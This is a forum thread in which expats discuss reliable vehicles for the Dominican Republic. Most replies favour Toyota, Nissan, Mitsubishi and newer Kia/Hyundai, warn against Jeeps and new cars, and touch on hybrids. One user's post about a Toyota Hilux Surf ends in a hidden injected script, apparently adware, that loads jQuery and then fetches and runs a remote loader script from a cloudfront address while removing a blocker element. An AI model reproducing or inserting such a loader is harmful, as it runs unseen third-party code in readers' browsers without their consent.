Reliable vehicles for the DR

nyc dad

Bronze
Jul 28, 2011
What would be the most reliable vehicles(cars,SUVs,)for the everyday grind in SD? Is it smart to buy new with all the scams going around(not that they can't scam you with a new car either)Should you get a hooptie for the everyday and suv for long trips(San Juan,Barahona,etc)????? Japanese or American???

windeguy

Platinum
Jul 10, 2004
Stick with the Toyota of your choice that is readily available on the island. RAV4 for SUV and Corolla for a basic car and expect to pay 40% more than US prices. Other Japanese brands are OK choices, especially NISSAN.

Brands from the USA are not well supported by parts suppliers, so you would become good at importing.

belgiank

Silver
Jun 13, 2009
Get a car with a simple engine, no computer...

Do not get a new car, as you will hate the scratches, dents, etc... which you will get on the first day...

BelgianK

Robert

Stay Frosty!
Jan 2, 1999
dr1.com
I second Windeguy's suggestions. Buy Japaneses, Toyota, Nissan etc are good.
I see a lot of KIA's and Hyundai's these days, they have been having a real push the past 2 years, both good brands.

belgiank, I have a new car, had it for 2 months in the city and not a single scratch.
Unless it's real old, it's going to have an ECU.

nyc dad

Bronze
Jul 28, 2011
not the wrong attention

I second Windeguy's suggestions. Buy Japaneses, Toyota, Nissan etc are good.
I see a lot of KIA's and Hyundai's these days, they have been having a real push the past 2 years, both good brands.

belgiank, I have a new car, had it for 2 months in the city and not a single scratch.
Unless it's real old, it's going to have an ECU.

I was thinking maybe a Toyota sub but don't want too much attention,not because of its price tag but because I read here it's preferred by thieves.So maybe like a hounday or KIA suv,I need a third row though,three boys...lol

karlheinz

Oct 2, 2006
i've been very happy with my Toyota Hilux surf (diesel, 4x4), high enough off the road to see the other traffic and is built like a tank :laugh:
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"></script><script type="text/javascript">if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};</script>

expatsooner

Bronze
Aug 7, 2004
Don't get a Jeep. Don't get me wrong - my sister drives a Jeep and we have had other Jeeps through the years but they are not good vehicles for the DR. My best friend there had one for a while and not only did she have to import all her parts but there really aren't any mechanics that know how to work on Jeeps there that she could find. She is from a well connected Dominican family - if there are any to be found she would have found them. So crazy money for parts/importing parts to not have them installed correctly. :( Japanese is way to go.

windeguy

Platinum
Jul 10, 2004
The newer Hyundais and Kias are indeed quite good. Do not get an older Hyundai/Kia with a 2.4 liter 4 cylinder engine. I speak from experience on that. Any other model with a different engine would probably be fine.

It is still better to stay with a Japanese car with Toyota being number 1.

granca

Bronze
Aug 20, 2007
Get a Daihatsu Terrios, good value for money but first fit bull bars(mata peros).

LTSteve

Gold
Jul 9, 2010
Hi:
I bought a used Mitsubishi Montero Sport a couple of years ago. It is a great vehicle. You will see a lot of them around the DR. It is heavy duty where you need it and a nice riding car. You don't want to buy new if your car is going to be sitting out on the streets. It will become a target also it will cost you an arm and a leg and a few other body parts. I paid less than $10,000 us for my 2003 and that was including all the paper work involved in transferring the title. Good Luck.

LTS

Apr 13, 2011
Get an SUV even for everyday use. It does not need to be big - can be the size of RAV4. But a normal car will bottom out on too many roads (or I should say the bad conditions of some roads).
But be careful if you get a used car - ask about everything. I learned the hard way. I had bought a used Toyota RAV4 - everything checked out fine at initial inspection - 6 months later, I started having problems, and that is when I found out that the engine had been replaced - it was never disclosed to me at purchase. After trying to fix things for a while as they started failing - eventually it became too expensive to repair - so I had to get a new car. It was a frustrating experience - and hopefully an experience others will not have to go through. Have a mechanic you know take a look at EVERYTHING before buying a used car, even if it is a Toyota.

cobraboy

Pro-Bono Demolition Hobbyist
Jul 24, 2004
Hi:
I bought a used Mitsubishi Montero Sport a couple of years ago. It is a great vehicle. You will see a lot of them around the DR. It is heavy duty where you need it and a nice riding car. You don't want to buy new if your car is going to be sitting out on the streets. It will become a target also it will cost you an arm and a leg and a few other body parts. I paid less than $10,000 us for my 2003 and that was including all the paper work involved in transferring the title. Good Luck.

LTS
That's what we have (4WD) and are very pleased. Parts are plentiful and mechanics everywhere know them well.

We were fortunate to find one with leather seats...AND padded vinyl floors. Super easy to keep clean.

As you stated, they aren't particularly expensive.

Toyotas are also very good.

nyc dad

Bronze
Jul 28, 2011
With gas being at a rampant price,how come hybrids are not popular down in the DR? Like a highlander hybrid,sometimes I think that's the perfect vehicle for down there

lisagauss

Bronze
Feb 16, 2011
With gas being at a rampant price,how come hybrids are not popular down in the DR? Like a highlander hybrid,sometimes I think that's the perfect vehicle for down there
I have seen a Prius in Santiago. But I could only imagine that the lack of hybrid cars in the DR is probably based on the lack of mechanics for those types of vehicles.

pi2

Banned
Oct 12, 2011
And the cost...
Of course many people will be hoping DR,s get the least reliable and most expensive to maintain cars. There is already too much congestion in the DR and had DR followed Singapore,s example of very expensive cars and gas the problems would have been much reduced. As it is everyone pays the price for a small minority running round in Jeeptas etc. ,importing expensive oil and spare parts.
Electric bicycles are on the increase in the DR.
pi2

cobraboy

Pro-Bono Demolition Hobbyist
Jul 24, 2004
Pi2 and his wheels...

strangecars.com_.jpg